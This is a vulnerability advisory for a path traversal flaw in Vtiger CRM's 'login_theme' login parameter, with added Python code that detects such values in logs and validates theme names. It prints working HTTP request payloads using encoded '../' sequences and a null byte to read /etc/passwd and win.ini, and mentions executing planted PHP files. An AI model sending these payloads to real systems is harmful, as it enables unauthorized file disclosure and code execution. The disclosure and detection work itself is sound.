Summary:
A Path Traversal vulnerability exists in Vtiger CRM release 5.1.0 (Linux) and 5.2.0RC (Windows). It allows a malicious user to view the contents of any file that resides on the machine on which Vtiger CRM is installed. In addition, if the malicious user can place his/her own PHP file on the same machine, this vulnerability can be used to execute the contents of that PHP file under the permissions used by the Vtiger CRM application.
Description:
The vulnerability exists in the 'login_theme' parameter, which is passed as part of the login request to the application, as can be seen below:
[Login, HTTP Request - Line Wrapped]
POST /vtigercrm/index.php HTTP/1.1
Content-Length: ...
Content-Type: application/x-www-form-urlencoded
Host: www.vuln.site
Connection: Keep-Alive
module=Users&action=Authenticate&return_module=Users&return_action=Login&
user_name=standarduser&user_password=user&login_theme=[MALICIOUS_PAYLOAD]&
login_language=en_us&Login.x=41&Login.y=20
[End of HTTP Request]
In order to exploit this vulnerability, a malicious user can manipulate the value of the 'login_theme' parameter to a value such as:
[On Windows OS]
login_theme=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini%00
[On Linux/Unix OS]
login_theme=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd%00
For example:
[Sample Exploit for Windows OS]
POST /vtigercrm/index.php HTTP/1.1
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Host: www.vuln.site
module=Users&action=Authenticate&return_module=Users&return_action=Login&
user_name=standarduser&user_password=user&
login_theme=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/
%2E%2E/%2E%2E/windows/win.ini%00&login_language=en_us&Login.x=41&Login.y=20
[End of Sample Exploit]
In addition to the above, if the malicious user is able to plant a PHP file of his/her choice somewhere on the same file system as the Vtiger CRM installation, he/she can use this vulnerability to execute that PHP file under the permissions of the Vtiger CRM process.
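The request shown above illustrates the two ingredients of this traversal: URL-encoded dot-dot segments (%2E%2E) and a trailing %00 that truncates the file name. The following Python is an added example, not code from the advisory or from Vtiger CRM, showing how a defender can detect such values in captured login request bodies and how a theme parameter can be validated safely (allow-listed name, then a realpath check against the themes directory). The sample bodies, the theme name 'softed' and the themes directory path are constructed for the example.

```python
import os
import re
from typing import Optional
from urllib.parse import parse_qs, unquote

# Constructed sample request bodies, modelled on the advisory's login request.
SAMPLE_BODIES = [
    "module=Users&action=Authenticate&user_name=standarduser&user_password=user"
    "&login_theme=softed&login_language=en_us",
    "module=Users&action=Authenticate&user_name=standarduser&user_password=user"
    "&login_theme=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd%00"
    "&login_language=en_us",
]

# A theme is a plain directory name: letters, digits, '_' or '-', nothing else.
THEME_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def theme_param(body: str) -> Optional[str]:
    """Extract and fully decode login_theme from a form body (None if absent)."""
    values = parse_qs(body, keep_blank_values=True).get("login_theme")
    if not values:
        return None
    raw = values[0]  # parse_qs already decoded one layer (%2E -> '.', %00 -> NUL)
    for _ in range(3):  # decode again so double-encoded dots (%252E) do not slip through
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def is_traversal_attempt(body: str) -> bool:
    """Detection: flag login_theme values containing NUL, '..' or a path separator."""
    value = theme_param(body)
    if value is None:
        return False
    return "\x00" in value or ".." in value or "/" in value or "\\" in value


def resolve_theme_dir(value: str, themes_root: str) -> Optional[str]:
    """Mitigation: allow-list the name, then confirm the resolved path stays under themes_root."""
    if not THEME_NAME.fullmatch(value):
        return None
    root = os.path.realpath(themes_root)
    candidate = os.path.realpath(os.path.join(root, value))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate
```

Run over web server access or request logs, `is_traversal_attempt` gives a simple indicator for probing of this parameter; `resolve_theme_dir` is the shape of the server-side fix, since the allow-list alone already rejects every payload form shown in this advisory.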
Solution:
This issue was fixed in Vtiger CRM release 5.2.1.
References: